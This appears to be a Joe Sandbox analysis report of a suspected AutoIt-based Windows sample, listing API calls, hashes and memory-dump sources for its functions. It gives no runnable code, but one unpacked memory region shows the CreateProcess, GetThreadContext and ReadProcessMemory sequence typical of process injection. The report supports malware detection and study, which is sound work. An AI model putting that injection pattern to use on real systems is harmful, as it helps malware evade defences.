• Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
• Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
• Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
• Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C

APIs
  • Part of subcall function 04738080: Sleep.KERNELBASE(000001F4), ref: 04738091
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 047382D0
Strings
Memory Dump Source
• Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4735000_x.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: 126JAQLX8TGRQNB1RKK3K4HJP3
• API String ID: 2694422964-4220706828
• Opcode ID: e77b826369003c6266fd29d4d1644c7f31fb78fe003455d6f695d6b2303182ee
• Instruction ID: 34c4475e285460497639a97c0472cb00c2f42da3c407830759f38a3e9d2b472a
• Opcode Fuzzy Hash: e77b826369003c6266fd29d4d1644c7f31fb78fe003455d6f695d6b2303182ee
• Instruction Fuzzy Hash: 8D61A470D04288DAEF11DBB4C848BDEBBB4AF15304F044199E6487B3C1D7B91B49CB66

APIs
• LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcsncpy.LIBCMT ref: 00401C41
• _wcscpy.LIBCMT ref: 00401C5D
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
• String ID: Line:
• API String ID: 1874344091-1585850449
• Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
• Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
• Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
• Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E

APIs
• RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
• RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
• RegCloseKey.KERNELBASE(?), ref: 0040F2B5
• RegCloseKey.ADVAPI32(?), ref: 0040F2C9
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Close$OpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 1607946009-824357125
• Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
• Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4

APIs
• SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
• SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
• _wcsncpy.LIBCMT ref: 004102ED
• SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
• _wcsncpy.LIBCMT ref: 00410340
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: _wcsncpy$DesktopFolderFromListMallocPath
• String ID:
• API String ID: 3170942423-0
• Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
• Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID:
• String ID: Wu
• API String ID: 0-4083010176
• Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
• Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
• Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
• Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86

APIs
• GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
• TerminateProcess.KERNEL32(00000000), ref: 004753CE
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Process$CurrentTerminate
• String ID: Wu
• API String ID: 2429186680-4083010176
• Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
• Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
• Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
• Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96

APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0473783B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 047378D1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 047378F3
• TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 04737BFC
Memory Dump Source
• Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4735000_x.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
• String ID:
• API String ID: 572931308-0
• Opcode ID: dd5ff2c0333f679b22dfbad47a12c49e5bc70870eaab63e39cb7295a27d4d700
• Instruction ID: a490e34459e5a904794331963ec25786f20d4ca40fbe0cef5ca9a4be53eda873
• Opcode Fuzzy Hash: dd5ff2c0333f679b22dfbad47a12c49e5bc70870eaab63e39cb7295a27d4d700
• Instruction Fuzzy Hash: FF621C70A14258DBEB24CFA4C850BDEB376EF58301F1091A9D10DEB391E776AE81CB59

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: Error:
                                                                                              • API String ID: 4104443479-232661952
                                                                                              • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                              • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                              • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                              • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                              APIs
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                              • String ID: X$pWH
                                                                                              • API String ID: 85490731-941433119
                                                                                              • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                              • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                              • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                              • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • _memmove.LIBCMT ref: 00401B57
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                              • String ID: @EXITCODE
                                                                                              • API String ID: 2734553683-3436989551
                                                                                              • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                              • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                              • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                              • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 1794320848-0
                                                                                              • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                              • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                              • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                              • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                              APIs
                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_
                                                                                              • String ID:
                                                                                              • API String ID: 1144537725-0
                                                                                              • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                              • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                              • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                              • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 0043214B
                                                                                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                              • _malloc.LIBCMT ref: 0043215D
                                                                                              • _malloc.LIBCMT ref: 0043216F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _malloc$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 680241177-0
                                                                                              • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                              • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                              • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                              • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                              APIs
                                                                                              • TranslateMessage.USER32(?), ref: 00409556
                                                                                              • DispatchMessageW.USER32(?), ref: 00409561
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 4217535847-0
                                                                                              • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                              • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                                              • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                              • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                                              APIs
                                                                                                • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                              • _free.LIBCMT ref: 004295A0
                                                                                                • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                                              • API String ID: 3938964917-2806939583
APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0473816A
Strings
Memory Dump Source
• Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4735000_x.jbxd
Similarity
• API ID: CreateProcess
• String ID: D
• API String ID: 963392458-2746444292
Strings
• >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: _strcat
• String ID: >>>AUTOIT NO CMDEXECUTE<<<
• API String ID: 1765576173-2684727018
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0473783B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 047378D1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 047378F3
• TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 04737BFC
Memory Dump Source
• Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4735000_x.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
• String ID:
• API String ID: 572931308-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• __wsplitpath.LIBCMT ref: 004678F7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ErrorLast__wsplitpath_malloc
• String ID:
• API String ID: 4163294574-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
• _strcat.LIBCMT ref: 0040F786
  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
• String ID:
• API String ID: 3199840319-0
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
• __lock_file.LIBCMT ref: 00414A8D
  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
• __fclose_nolock.LIBCMT ref: 00414A98
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
• __lock_file.LIBCMT ref: 00415012
• __ftell_nolock.LIBCMT ref: 0041501F
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2999321469-0
